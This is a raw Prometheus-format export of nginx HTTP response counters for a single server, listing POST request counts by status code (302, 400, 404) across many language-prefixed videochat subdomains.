nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.world"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.cafe"} 701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.date"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.world"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="qdrqgda.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="qshicka.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.date"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.mx"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ryfusmrj.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.mx"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.date"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.mx"} 235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.world"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.date"} 265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.show"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.world"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sptlqmk.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.date"} 187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.tv.br"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.cafe"} 359 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.date"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.cafe"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.world"} 304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.world"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.cafe"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.date"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.world"} 223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.date"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.world"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.cafe"} 618 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.date"} 218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.mx"} 791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.show"} 269 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.tv.br"} 11056 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.world"} 555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vmi460104.contaboserver.net"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="waqqvxh.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="wngqune.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xbodfbs.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.tv.br"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.world"} 154 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ybifrit.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.date"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="-"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="161.97.120.25"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="161.97.120.25:80"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="de.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="is.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="161.97.120.25"} 2210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="161.97.120.25:80"} 670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="account.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="admin.th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="admin.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.world"} 227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.world"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.cafe"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.world"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="app.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.cafe"} 216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.world"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.tv.br"} 489 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.world"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.date"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.world"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.tv.br"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.world"} 270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="beta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.date"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.mx"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.world"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="blog.id.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="blog.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.tv.br"} 261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.world"} 139 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.world"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bwfzopl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.mx"} 266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.tv.br"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.world"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.world"} 285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.world"} 238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ckdbbet.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.date"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.world"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.world"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cytjruk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="czhdzka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.date"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.show"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.tv.br"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.world"} 439 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="dashboard.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.mx"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.world"} 236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="demo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="dev.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.tv.br"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.mx"} 239 